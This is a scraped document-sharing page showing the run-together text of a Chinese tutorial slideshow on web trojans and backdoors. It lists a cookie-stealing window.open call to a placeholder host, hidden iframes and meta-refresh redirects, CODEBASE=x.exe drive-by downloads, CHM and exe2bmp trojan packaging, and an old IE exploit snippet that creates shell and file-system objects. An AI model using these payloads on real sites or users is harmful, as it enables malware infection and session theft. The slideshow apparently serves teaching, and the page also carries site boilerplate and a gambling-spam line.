网站大量收购闲置独家精品文档,联系QQ:2885784924

网络安全后门教程.pptVIP

  1. 1、本文档共10页,可阅读全部内容。
  2. 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  5. 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  6. 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  7. 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  8. 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多

email传播网页31Window.open(“/info.asp?msg=‘+document.cookie”)/scriptscriptlanguage=javascript01/bodybodyonload=“windows.location=‘http://xxxx’;”02email传播网页323.framesetcols=“100%,*”framesrc=“http://xxxx”scrolling=“auto”/frameset4.metahttp-equiv=“refresh”content=“0;URL=http://xxxx”5iframesrc=/index.htmlwidth=0height=0frameborder=0/IFRAMEemail传播网页33objectdata=“htpp://xxxxx/x.ASPwidth=0height=0Chm传播网页木马34x.htm:wight=0height=0CODEBASE=x.exeorOBJECTWidth=0Height=0style=display:none;TYPE=application/x-oleobjectCODEBASE=x.exeEasyCHMorQuickchm把x.htm和x.exe生成x.chmexe2bmp35exe2bmp可以将一个.exe可执行文件生成同名的.bmp、.asp、.htm三个文件。将这三个文件放到支持ASP的空间里边,当别人打开.htm网页文件的时候,先前的.exe木马将被自动下载到对方的硬盘并运行。Forexamplex.exeproduce:x.bmp;x.asp;x.htmx.htm36html1head2/head3body4数据装载中,可能需要10秒至30秒............5IMGSRC=x.bmpwidth=0height=06objectdata=x.ASPwidth=0height=07/object8/body9/html10x.asp371-在cache中寻找1.bmp2-把bmp还原为exe3-执行exe正常网页中携带38iframesrc=http://xxxx/index.htmlwidth=0height=0frameborder=0/IFRAME1Window.open2Onload,onerror3metahttp-equiv=“refresh”content=“0;URL=http://xxxx”4objectdata=“htpp://xxxxx/x.ASPwidth=0height=05OBJECTWidth=0Height=0style=display:none;TYPE=application/x-oleobjectCODEBASE=x.exe6网页病毒、网页木马的原理39Javascript.Exception.Exploit:JS+WSH错误的MIMEMultipurposeInternetMailExtentions,多用途的网际邮件扩充协议头.IE5.0到IE6.0EXEto.BMP+Javascritp.Exception.Exploit123654EXE文件的捆绑通过安全认证的CAB,COXiframe?漏洞的利用:父窗口能在子域环境下运行脚本代码,包括任意的恶意代码Javascript.Exception.ExploitFunctiondestroy(){try{a1=document.applets[0];a1.setCLSID({F935DC22-1CF0-11D0-ADB9-00C04FD58A0B});a1.createInstance();Shl=a1.GetObject();a1.setCLSID({0D43FE01-F093-11CF-8940-00A0C9054228});a1.createInstance();FSO=a1.GetObject();a1.setCLSID({F935DC26-1CF0-11D0-ADB9-00C04FD58A0B});a1.createInstance();Net=a1.GetObject();try{dosomething;}}catch(e){}}catch(e){}}fu

文档评论(0)

wuyoujun92 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档